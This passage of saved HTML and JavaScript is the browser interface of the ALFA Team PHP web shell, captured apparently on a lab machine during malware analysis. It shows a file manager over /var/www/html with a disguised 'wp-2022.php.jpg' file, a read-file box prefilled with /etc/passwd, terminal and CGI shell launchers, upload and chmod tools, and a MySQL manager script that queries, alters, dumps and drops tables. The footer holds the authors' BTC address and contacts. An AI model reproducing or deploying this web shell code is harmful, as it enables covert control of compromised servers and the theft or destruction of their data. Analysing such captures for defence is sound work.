style="position:relative;display:inline-block;bottom:12px;"><a row="1" id="id_1" class="main_name" onclick="g('FilesMan','/var/www/html/ALFA_DATA');" href="#action=fileman&amp;path=/var/www/html/ALFA_DATA" fname="ALFA_DATA" ftype="folder" path="/var/www/html/" opt_title=""><b>| ALFA_DATA |</b></a></div></td><td><span style="font-weight:unset;" class="main_size">dir</span></td><td><span style="font-weight:unset;" class="main_modify">2023-02-12 23:15:54</span></td><td><span style="font-weight:unset;" class="main_owner_group">www-data/www-data</span></td><td><a id="id_chmode_1" href="javascript:void(0)" onclick="editor('ALFA_DATA','chmod','','','','dir')"><span style="font-weight:unset;" class="main_green_perm">0755</span><span style="font-weight:unset;" class="beetween_perms"> &gt;&gt; </span><span style="font-weight:unset;" class="main_green_perm">d​r​w​x​r​-x​r​-x​</span></a></td><td><a id="id_rename_1" title="Rename" class="actions" href="javascript:void(0);" onclick="editor('ALFA_DATA', 'rename','','','','dir')">R</a> <a id="id_touch_1" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor('ALFA_DATA', 'touch','','','','dir')">T</a><a id="id_delete_1" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm('Are You Sure For Delete # ALFA_DATA # ?'); chk ? g('FilesMan',null,'delete', 'ALFA_DATA') : '';"> X </a></td></tr><tr class="fmanager-row" id="tr_row_2"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="beneri.se_malware_analysis" class="chkbx" id="checkbox_287612"><label for="checkbox_287612"></label></div></td><td id="td_row_2"><img src="http://solevisible.com/icons/notfound.png" width="30" height="30"><div style="position:relative;display:inline-block;bottom:12px;"><a row="2" id="id_2" class="main_name" onclick="editor('beneri.se_malware_analysis','auto','','','','file');" href="#action=fileman&amp;path=/var/www/html/&amp;file=beneri.se_malware_analysis" fname="beneri.se_malware_analysis" ftype="file" path="/var/www/html/" opt_title="">beneri.se_malware_analysis</a></div></td><td><span style="font-weight:unset;" class="main_size">0 B</span></td><td><span style="font-weight:unset;" class="main_modify">2023-02-12 23:15:52</span></td><td><span style="font-weight:unset;" class="main_owner_group">root/root</span></td><td><a id="id_chmode_2" href="javascript:void(0)" onclick="editor('beneri.se_malware_analysis','chmod','','','','file')"><span style="font-weight:unset;" class="main_white_perm">0644</span><span style="font-weight:unset;" class="beetween_perms"> &gt;&gt; </span><span style="font-weight:unset;" class="main_white_perm">-​r​w​-r​--r​--</span></a></td><td><a id="id_rename_2" title="Rename" class="actions" href="javascript:void(0);" onclick="editor('beneri.se_malware_analysis', 'rename','','','','file')">R</a> <a id="id_touch_2" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor('beneri.se_malware_analysis', 'touch','','','','file')">T</a> <a id="id_edit_2" class="actions" title="Edit" href="javascript:void(0);" onclick="editor('beneri.se_malware_analysis', 'edit','','','','file')">E</a> <a id="id_download_2" title="Download" class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'download')">D</a><a id="id_delete_2" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm('Are You Sure For Delete # beneri.se_malware_analysis # ?'); chk ? g('FilesMan',null,'delete', 'beneri.se_malware_analysis') : '';"> X </a></td></tr><tr class="fmanager-row" id="tr_row_3"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="wp-2022.php.jpg" class="chkbx" id="checkbox_287613"><label for="checkbox_287613"></label></div></td><td id="td_row_3"><img src="http://solevisible.com/icons/jpg.png" width="30" height="30"><div style="position:relative;display:inline-block;bottom:12px;"><a row="3" id="id_3" class="main_name" onclick="editor('wp-2022.php.jpg','auto','','','','file');" href="#action=fileman&amp;path=/var/www/html/&amp;file=wp-2022.php.jpg" fname="wp-2022.php.jpg" ftype="file" path="/var/www/html/" opt_title="">wp-2022.php.jpg</a></div></td><td><span style="font-weight:unset;" class="main_size">694 B</span></td><td><span style="font-weight:unset;" class="main_modify">2023-02-12 23:15:52</span></td><td><span style="font-weight:unset;" class="main_owner_group">osboxes/osboxes</span></td><td><a id="id_chmode_3" href="javascript:void(0)" onclick="editor('wp-2022.php.jpg','chmod','','','','file')"><span style="font-weight:unset;" class="main_white_perm">0664</span><span style="font-weight:unset;" class="beetween_perms"> &gt;&gt; </span><span style="font-weight:unset;" class="main_white_perm">-​r​w​-r​w​-r​--</span></a></td><td><a id="id_rename_3" title="Rename" class="actions" href="javascript:void(0);" onclick="editor('wp-2022.php.jpg', 'rename','','','','file')">R</a> <a id="id_touch_3" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor('wp-2022.php.jpg', 'touch','','','','file')">T</a> <a id="id_edit_3" class="actions" title="Edit" href="javascript:void(0);" onclick="editor('wp-2022.php.jpg', 'edit','','','','file')">E</a> <a id="id_download_3" title="Download" class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'wp-2022.php.jpg', 'download')">D</a><a id="id_delete_3" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm('Are You Sure For Delete # wp-2022.php.jpg # ?'); chk ? g('FilesMan',null,'delete', 'wp-2022.php.jpg') : '';"> X </a></td></tr><tr id="filemanager_last_tr"><td colspan="7">
<input type="hidden" name="a" value="FilesMan">
<input type="hidden" name="c" value="/var/www/html/">
<input type="hidden" name="charset" value="">
<select id="tools_selector" name="alfa1"><option value="copy">Copy</option><option value="move">Move</option><option value="delete" selected="">Delete</option><option value="zip">Add 2 Compress (zip)</option><option value="unzip">Add 2 Uncompress (zip)</option><option value="paste">Paste / Zip / Unzip </option></select>
<input type="submit" value=" ">
</td></tr></tbody></table><div class="pages-holder"><div class="pages-number"></div></div></form></div></div></div><table class="foot" width="100%" border="0" cellspacing="3" cellpadding="0">
<tbody><tr>
<td width="17%"><form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;"><span class="footer_text">Make File : </span><br><input class="dir" type="text" name="f" value=""> <input type="submit" value=" "></form></td>
<td width="21%"><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;"><span class="footer_text">Make Dir : </span><br><input class="dir" type="text" name="d" value=" "> <input type="submit" value=" "></form></td>
<td width="22%"><form onsubmit="g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;"><span class="footer_text">Delete : </span><br><input class="dir" type="text" name="del" value=" "> <input type="submit" value=" "></form></td>
<td width="19%"><form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;"><span class="footer_text">Chmod : </span><br><input class="dir" type="text" name="f" value=" "> <input type="submit" value=" "></form></td>
</tr>
<tr>
<td colspan="2"><form onsubmit="g(&quot;FilesMan&quot;,this.c.value,&quot;&quot;);return false;"><span class="footer_text">Change Dir : </span><br><input class="foottable" id="footer_cwd" type="text" name="c" value="/var/www/html/"> <input type="submit" value=" "></form></td>
<td colspan="2"><form onsubmit="editor(this.file.value,'view','','','','file');return false;"><span><span class="footer_text">Read File : </span></span><br><input class="foottable" type="text" name="file" value="/etc/passwd"> <input type="submit" value=" "></form></td>
</tr>
<tr>
<td colspan="4"><form style="margin-top: 10px;" onsubmit="return false;" autocomplete="off"><span><span class="footer_text">Execute :</span><br><button onclick="alfaOpenPhpTerminal();return false;" class="foottable alfa_custom_cmd_btn"><img style="width:28px;vertical-align: middle;" src="http://solevisible.com/icons/menu/terminal.svg"> Terminal</button><br></span></form></td>
</tr>
<tr>
<td colspan="4"><form onsubmit="u(this);return false;" name="footer_form" method="post" enctype="multipart/form-data">
<input type="hidden" name="a" value="FilesMAn">
<input type="hidden" name="c" value="/var/www/html/">
<input type="hidden" name="ajax" value="true">
<input type="hidden" name="alfa1" value="uploadFile">
<input type="hidden" name="charset" value="Windows-1251">
<span class="footer_text">Upload file: </span><span><button id="addup" onclick="addnewup();return false;"><b>+</b></button></span><p id="pfooterup"><label class="inputfile" for="footerup"><span id="__fnameup"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="footerup" class="toolsInp" type="file" name="f[]" onchange="handleup(this,0);" multiple=""></p><input type="submit" name="submit" value=" "></form><div id="alfa-copyright"><span class="copyright">[ ./AlfaTeam © 2012-2023 ]</span><br><span><a href="javascript:void(0);" onclick="alert(&quot;BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo&quot;);" style="color: #E91E63;text-decoration: none;">Donate Us !</a></span> <span style="letter-spacing: 2px;color: #dfff00;">solevisible[at]gmail.com</span> <span><a style="color: #ff6060;text-decoration: none;" target="_blank" href="https://telegram.me/solevisible">@solevisible</a></span></div></td>
</tr>
</tbody></table>
</div>

<div id="options_window" style="background: rgba(0, 0, 0, 0.69); display: none;"><div class="editor-wrapper"><div class="editor-header"><div class="opt-title"></div><div class="editor-controller"><div class="editor-minimize" onclick="editorMinimize(&quot;options_window&quot;);"></div><div onclick="editorClose(&quot;options_window&quot;);" class="close-button"></div></div></div><div style="height:100%;" class="content_options_holder"><div class="options_tab"></div><div class="options_content" style="margin-left:14px;margin-right:30px;background:#000;overflow:auto;"></div></div></div></div>

<div id="database_window" style="background:rgba(0, 0, 0, 0.69);"><div class="editor-wrapper"><div class="editor-header"><div class="opt-title">Sql Manager</div><div class="editor-controller"><div class="editor-minimize" onclick="editorMinimize(&quot;database_window&quot;);"></div><div onclick="editorClose(&quot;database_window&quot;);" class="close-button"></div></div></div><div class="content_options_holder" style="margin-left:14px;margin-right:30px;background:#000;max-height:90%;"><div class="sql-tabs"></div><div class="sql-contents" style="max-height: 85vh;"></div></div></div></div>

<div id="cgiloader" style="display: none;"><div class="editor-wrapper"><div class="editor-header"><div class="opt-title"></div><div class="editor-controller"><div class="editor-minimize" onclick="editorMinimize(&quot;cgiloader&quot;);"></div><div onclick="editorClose(&quot;cgiloader&quot;);" class="close-button"></div></div></div><div id="cgiframe" style="position:relative;margin-left:14px;margin-right:30px;"><div class="terminal-tabs"></div><div style="height:90%;" class="terminal-contents"></div></div></div></div>
<div id="editor" style="display:none;"><div class="editor-wrapper"><div class="editor-header"><div class="editor-path"></div><div class="editor-controller"><div class="editor-minimize" onclick="editorMinimize(&quot;editor&quot;);"></div><div onclick="editorClose(&quot;editor&quot;);" class="close-button"></div></div></div><div onclick="historyPanelController(this);" mode="visible" class="history-panel-controller">&lt;&lt;</div><div class="editor-explorer"><div class="hheader"><div class="history-clear" onclick="clearEditorHistory();">Clear all</div><div class="hheader-text">History</div><div class="editor-search"><input type="text" style="text-align:center;" id="search-input" placeholder="search"></div></div><div class="history-list"></div></div><div class="editor-modal"><div class="editor-body"><div class="editor-content"><div class="editor-tabs"></div><div class="editor-content-holder"></div></div></div></div></div></div>
<div id="update-content"></div>
<div id="database_window-minimized" onclick="showEditor(&quot;database_window&quot;);"><div class="minimized-wrapper"><span class="options_min_badge">0</span><div class="minimized-text" style="top: 15px;">Database</div></div></div>
<div id="options_window-minimized" onclick="showEditor(&quot;options_window&quot;);"><div class="minimized-wrapper"><span class="options_min_badge">0</span><div style="top: 4px;" class="minimized-text">Options</div></div></div>
<div id="editor-minimized" onclick="showEditor(&quot;editor&quot;);"><div class="minimized-wrapper"><span class="options_min_badge">0</span><div style="top: 2px;" class="minimized-text">Editor</div></div></div>
<div id="cgiloader-minimized" onclick="showEditor(&quot;cgiloader&quot;);"><div class="minimized-wrapper"><span class="options_min_badge">0</span><div style="top: 12px;" class="minimized-text">Cgi Shell</div></div></div>
<div id="rightclick_menu">
  <a target="_blank" href="" name="newtab"><img src="http://solevisible.com/icons/menu/newtab.svg"> Open in new tab</a>
  <a target="_blank" href="" name="link"><img src="http://solevisible.com/icons/menu/link.svg"> Open file directly</a>
  <a href="javascript:void(0);" name="download"><img src="http://solevisible.com/icons/menu/download2.svg"> Download</a>
  <a href="" name="view"><img src="http://solevisible.com/icons/menu/view.svg"> View</a>
  <a href="javascript:void(0);" onclick="alfaSyncMenuToOpt(this);" path="" fname="" name="view_archive"><img src="http://solevisible.com/icons/menu/view.svg"> View Archive</a>
  <a href="" name="edit"><img src="http://solevisible.com/icons/menu/edit.svg"> Edit</a>
  <a href="javascript:void(0);" onclick="alfaPopupAction(this, &quot;move&quot;);" ftype="" path="" fname="" name="move"><img src="http://solevisible.com/icons/menu/move.svg"> Move</a>
  <a href="javascript:void(0);" onclick="alfaPopupAction(this, &quot;copy&quot;);" ftype="" path="" fname="" name="copy"><img src="http://solevisible.com/icons/menu/copy.svg"> Copy</a>
  <a href="javascript:void(0);" onclick="alfaPopupAction(this, &quot;rename&quot;);" ftype="" path="" fname="" name="rename"><img src="http://solevisible.com/icons/menu/rename.svg">  Rename</a>
  <a href="javascript:void(0);" onclick="alfaPopupAction(this, &quot;modify&quot;);" ftype="" path="" fname="" name="modify"><img src="http://solevisible.com/icons/menu/time.svg">  Modify</a>
  <a href="javascript:void(0);" onclick="alfaPopupAction(this, &quot;permission&quot;);" name="permission"><img src="http://solevisible.com/icons/menu/key.svg"> Change Permissions</a>
  <a href="javascript:void(0);" onclick="alfaSyncMenuToOpt(this);" path="" fname="" name="compress"><img src="http://solevisible.com/icons/menu/resize.svg"> Compress</a>
  <a href="javascript:void(0);" onclick="alfaSyncMenuToOpt(this);" path="" fname="" name="extract"><img src="http://solevisible.com/icons/menu/increase.svg"> Extract</a>
  <a href="javascript:void(0);" name="delete"><img src="http://solevisible.com/icons/menu/delete.svg"> Delete</a>
</div>
<div id="filesman-tab-full-path"></div>
<div id="alert-area" class="alert-area"></div>
<div class="cl-popup-fixed" style="display:none;">
	<div id="shortcutMenu-holder">
		<div class="popup-head"></div>
			<form autocomplete="off" onsubmit="return false;">
				<label class="old-path-lbl"></label>
				<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;" class="old-path-content"></div>
				<label style="margin-top:10px;" class="new-filename-lbl">New file name</label>
				<input type="text" name="fname">
				<div class="perm-table-holder">
					<table>
					   <tbody>
					      <tr>
					         <td><b>Mode</b></td>
					         <td>User</td>
					         <td>Group</td>
					         <td>World</td>
					      </tr>
					      <tr>
					         <td>Read</td>
					         <td><input type="checkbox" name="ur" value="4" onclick="calcperm();"></td>
					         <td><input type="checkbox" name="gr" value="4" onclick="calcperm();"></td>
					         <td><input type="checkbox" name="wr" value="4" onclick="calcperm();"></td>
					      </tr>
					      <tr>
					         <td>Write</td>
					         <td><input type="checkbox" name="uw" value="2" onclick="calcperm();"></td>
					         <td><input type="checkbox" name="gw" value="2" onclick="calcperm();"></td>
					         <td><input type="checkbox" name="ww" value="2" onclick="calcperm();"></td>
					      </tr>
					      <tr>
					         <td>Execute</td>
					         <td><input type="checkbox" name="ux" value="1" onclick="calcperm();"></td>
					         <td><input type="checkbox" name="gx" value="1" onclick="calcperm();"></td>
					         <td><input type="checkbox" name="wx" value="1" onclick="calcperm();"></td>
					      </tr>
					      <tr>
					         <td>Permission</td>
					         <td><input style="width:60px;" type="text" name="u" maxlength="1" oninput="this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, &quot;u&quot;, [&quot;u&quot;]);"></td>
					         <td><input style="width:60px;" type="text" name="g" maxlength="1" oninput="this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, &quot;g&quot;, [&quot;g&quot;]);"></td>
					         <td><input style="width:60px;" type="text" name="w" maxlength="1" oninput="this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, &quot;w&quot;, [&quot;w&quot;]);"></td>
					      </tr>
					   </tbody>
					</table>
				</div>

			</form>
		<div class="popup-foot">
			<button style="background: #2b5225;" name="accept" action="" onclick="alfaPopUpDoAction(this);"></button>
			<button style="background: #9e2c2c;" onclick="d.querySelector(&quot;.cl-popup-fixed&quot;).style.display=&quot;none&quot;;">Cancell</button>
		</div>
	</div>
</div><script>
function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'>&nbsp;<a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>&gt;</option><option value='>='>&gt;=</option><option value='<'>&lt;</option><option value='<='>&lt;=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area 